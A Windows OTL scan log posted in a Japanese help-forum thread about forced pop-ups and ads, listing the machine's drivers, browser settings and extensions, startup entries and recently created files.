DRV:[b]64bit:[/b] - [2012/08/14 18:03:34 | 002,206,352 | ---- | M] (VIA Technologies, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\viahduaa.sys -- (VIAHdAudAddService)
DRV:[b]64bit:[/b] - [2012/07/02 15:16:02 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:[b]64bit:[/b] - [2012/06/19 07:40:50 | 000,342,528 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:[b]64bit:[/b] - [2010/08/11 23:51:48 | 001,587,968 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ksaud.sys -- (ksaud)
DRV:[b]64bit:[/b] - [2010/07/05 13:47:00 | 000,565,248 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\GVUSB2.X64.SYS -- (GVUSB2.X64)
DRV - [2012/07/05 10:46:18 | 000,125,544 | ---- | M] () [Kernel | System | Running] -- C:\ProgramData\Kingsoft\klive\bin\encrypteddisk-x64.sys -- (EncryptedDisk)
DRV - [2007/07/06 15:34:36 | 000,016,800 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\RAWESR.sys -- (RAWESR)
DRV - [2007/07/06 15:34:34 | 000,013,600 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\LOGNT.SYS -- (LOGNT)
DRV - [2007/06/21 11:31:30 | 000,024,376 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\NTSTPL2.SYS -- (NTSTPL2)
DRV - [2007/06/21 11:31:30 | 000,024,376 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\ntstpl1.sys -- (NTSTPL1)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]

IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{502856A1-6DE0-41A4-B5E0-C086F87A22D4}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASBJS
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch = http://search.jword.jp/jwd_sb_srchcust.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OCustomizeSearch = http://search.jword.jp/jwd_sb_srchcust.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OSearchAssistant = http://search.jword.jp/jwd_sb_srchasst.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.jword.jp/jwd_sb_srchasst.htm?ielang={SUB_RFC1766}
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{726DA24E-A4A1-62E5-72EA-44C7886452CB}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASBJS


IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://localoem.msn.com
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://home.kingsoft.jp [binary data]
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes\{502856A1-6DE0-41A4-B5E0-C086F87A22D4}: "URL" = http://www.bing.com/search?FORM=UP97DF&PC=UP97&q={searchTerms}&src=IE-SearchBox
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

[color=#E56717]========== FireFox ==========[/color]

FF - prefs.js..browser.search.countryCode: "JP"
FF - prefs.js..browser.search.region: "JP"
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:37.0.1
FF - user.js - File not found

FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF64_17_0_0_169.dll File not found
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@gamepot.co.jp/GamepotEXeEnvCtrl;version=1: C:\Program Files (x86)\Gamepot\GPEXE\\npGPEXE.dll ()
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.co.jp/NxGame: C:\ProgramData\NexonJP\NGM\npNxGameJP.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKLM\Software\MozillaPlugins\pmang.jp/pmangsupport-1: C:\Users\ryota\Desktop\新しいフォルダー\GameOn\TERA\nppmangsupport_0.dll (gameon)
FF - HKCU\Software\MozillaPlugins\@neople.co.kr/NeopleGameInstaller: C:\ProgramData\NeoplePlugin\npNeopleGameInstaller.dll ( )

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Components: c:\program files (x86)\Mozilla Firefox\components [2014/08/30 11:40:53 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Plugins: c:\program files (x86)\Mozilla Firefox\plugins

[2014/05/16 21:28:33 | 000,000,000 | ---D | M] (No name found) -- C:\Users\ryota\AppData\Roaming\mozilla\Extensions
[2015/04/04 19:27:38 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2015/04/04 19:25:26 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

[color=#E56717]========== Chrome ==========[/color]

CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - homepage:
CHR - plugin: Error reading preferences file
CHR - Extension: Google ドキュメント = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\
CHR - Extension: Google ドライブ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0\
CHR - Extension: YouTube = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0\
CHR - Extension: Google Search = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0\
CHR - Extension: Twitch Stream = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjaicoojlfoococemdcaollmhaiolole\207\
CHR - Extension: Avira Browser Safety = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk\1.4.6_0\
CHR - Extension: Dropmark sidebar = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\foiapgoppijipmmgkaibacckkhbngfhp\171\
CHR - Extension: BlocKUTubEADi = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\geoafhlnmffijlblgohnpmjfbnpcpadd\3.2_0\
CHR - Extension: Google ウォレット = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\
  • かなは
  • 2015/04/21 (Tue) 20:29:12
Re: Pop-ups and ads are being forcibly displayed and I'm having trouble.
OTL log 2, after the refresh


O1 HOSTS File: ([2013/08/22 22:25:41 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:[b]64bit:[/b] - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O3 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\Toolbar\WebBrowser: (no name) - {AEF44653-C059-42CB-A5B7-41C640DA4A67} - No CLSID value found.
O4:[b]64bit:[/b] - HKLM..\Run: [Creative SB Monitoring Utility] C:\WINDOWS\SysNative\SBAVMon.dll (Creative Technology Ltd.)
O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxTray.exe (Intel Corporation)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [au_WiFi_Connect] C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe ()
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [eochk] File not found
O4 - HKLM..\Run: [Google Japanese Input Prelauncher] C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe (Google Inc.)
O4 - HKLM..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe (VIA)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe (Kingsoft Corp. Ltd.)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [DAEMON Tools Lite] C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe (i-Funbox.com)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [Line] C:\Program Files (x86)\Naver\LINE\Line.exe (LINE Corporation)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [OneDrive] C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\RunOnce: [Application Restart #0] C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O9:[b]64bit:[/b] - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O13[b]64bit:[/b] - gopher Prefix: missing
O13 - gopher Prefix: missing
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab (HGPluginJP28 Class)
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab (DMMLauncherAx Control)
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} http://down.hangame.co.jp/jp/installer/HgRunPub.cab (HgRunPub Class)
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab (NeffyLauncherCtl Class)
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab (Creative Software AutoUpdate Support Package 2)
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab (Creative Software AutoUpdate 2)
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab (Creative Software AutoUpdate Support Package)
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab (PubPlugin Class)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O18:[b]64bit:[/b] - Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\WINDOWS\SysWow64\userinit.exe (Microsoft Corporation)
O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O30 - LSA: Security Packages - (livessp) - File not found
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2003/04/04 12:00:00 | 000,000,058 | R--- | M] () - F:\autorun.inf -- [ CDFS ]
O33 - MountPoints2\{2284b339-6b2b-11e4-824f-fed426b625ef}\Shell - "" = AutoRun
O33 - MountPoints2\{2284b339-6b2b-11e4-824f-fed426b625ef}\Shell\AutoRun\command - "" = F:\install.exe -- [2003/04/04 12:00:00 | 000,131,072 | R--- | M] ()
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

CREATERESTOREPOINT
Restore point Set: OTL Restore Point

[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]

[2015/04/21 20:06:50 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\Old Firefox Data
[2015/04/20 21:58:27 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\herdProtect
[2015/04/20 21:58:26 | 000,000,000 | ---D | C] -- C:\Program Files\Reason
[2015/04/20 21:57:24 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
[2015/04/20 21:53:24 | 002,873,112 | ---- | C] (Reason Company Software Inc.) -- C:\Users\ryota\Desktop\herdProtectScan_Setup.exe
[2015/04/18 19:28:00 | 000,792,056 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
[2015/04/18 19:28:00 | 000,178,168 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/18 19:22:07 | 000,000,000 | ---D | C] -- C:\WINDOWS\SysNative\appraiser
[2015/04/16 05:26:09 | 000,085,504 | ---- | C] (Radius Inc.) -- C:\WINDOWS\SysWow64\iccvid.dll
[2015/04/15 04:37:56 | 007,476,032 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntoskrnl.exe
[2015/04/15 04:37:56 | 001,733,952 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntdll.dll
[2015/04/15 04:37:55 | 000,950,784 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\tdh.dll
[2015/04/15 04:37:55 | 000,749,568 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\tdh.dll
[2015/04/15 04:37:55 | 000,411,648 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\tracerpt.exe
[2015/04/15 04:37:55 | 000,369,152 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\tracerpt.exe
[2015/04/15 04:37:55 | 000,360,480 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\sechost.dll
[2015/04/15 04:37:55 | 000,285,184 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wow64.dll
[2015/04/15 04:37:55 | 000,246,272 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\microsoft-windows-system-events.dll
[2015/04/15 04:37:55 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wow64cpu.dll
[2015/04/15 04:37:48 | 001,385,256 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msctf.dll
[2015/04/15 04:37:47 | 000,780,800 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\lsm.dll
[2015/04/15 04:37:42 | 006,025,216 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript9.dll
[2015/04/15 04:37:41 | 000,720,384 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ie4uinit.exe
[2015/04/15 04:37:40 | 000,092,160 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\mshtmled.dll
[2015/04/15 04:37:39 | 000,816,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript.dll
[2015/04/15 04:37:39 | 000,801,280 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msfeeds.dll
[2015/04/15 04:37:39 | 000,664,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\jscript.dll
[2015/04/15 04:37:39 | 000,584,192 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\vbscript.dll
[2015/04/15 04:37:38 | 000,800,768 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ieapfltr.dll
[2015/04/15 04:37:38 | 000,710,144 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\ieapfltr.dll
[2015/04/15 04:36:49 | 002,373,632 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wucltux.dll
[2015/04/15 04:36:49 | 000,133,256 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuauclt.exe
[2015/04/15 04:36:48 | 000,891,392 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuapi.dll
[2015/04/15 04:36:48 | 000,721,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuapi.dll
[2015/04/15 04:36:48 | 000,408,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WUSettingsProvider.dll
[2015/04/15 04:36:48 | 000,267,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WinSetupUI.dll
[2015/04/15 04:36:48 | 000,200,192 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\storewuauth.dll
[2015/04/15 04:36:48 | 000,066,048 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wups.dll
[2015/04/15 04:36:48 | 000,052,224 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wups2.dll
[2015/04/15 04:36:48 | 000,015,360 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wu.upgrade.ps.dll
[2015/04/15 04:36:47 | 000,140,288 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuwebv.dll
[2015/04/15 04:36:47 | 000,124,928 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuwebv.dll
[2015/04/15 04:36:47 | 000,095,744 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wudriver.dll
[2015/04/15 04:36:47 | 000,081,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wudriver.dll
[2015/04/15 04:36:47 | 000,035,840 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuapp.exe
[2015/04/15 04:36:47 | 000,029,696 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuapp.exe
[2015/04/15 04:36:47 | 000,027,136 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wups.dll
[2015/04/15 04:36:31 | 000,377,152 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\drivers\clfs.sys
[2015/04/15 04:36:31 | 000,075,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\clfsw32.dll
[2015/04/15 04:36:31 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\clfsw32.dll
[2015/04/15 04:36:29 | 001,111,552 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aeinv.dll
[2015/04/15 04:36:29 | 000,957,440 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\appraiser.dll
[2015/04/15 04:36:29 | 000,769,024 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\invagent.dll
[2015/04/15 04:36:29 | 000,726,528 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\generaltel.dll
[2015/04/15 04:36:29 | 000,419,328 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\devinv.dll
[2015/04/15 04:36:29 | 000,227,328 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepdu.dll
[2015/04/15 04:36:29 | 000,192,000 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepic.dll
[2015/04/15 04:36:29 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\acmigration.dll
[2015/04/12 01:37:12 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Apple Computer
[2015/04/10 17:53:01 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Apple
[2015/04/04 21:24:54 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Malwarebytes
[2015/04/04 21:24:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes' Anti-Malware
[2015/04/04 21:24:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2015/04/04 21:24:36 | 000,025,928 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\mbam.sys
[2015/04/04 21:24:36 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware
[2015/04/04 21:21:57 | 010,285,040 | ---- | C] (Malwarebytes Corporation ) -- C:\Users\ryota\Desktop\mbam-setup-1.75.0.1300.exe
[2015/04/04 19:35:46 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Adobe
[2015/04/04 19:27:38 | 000,000,000 | ---D | C] -- C:\Users\ryota\Tracing
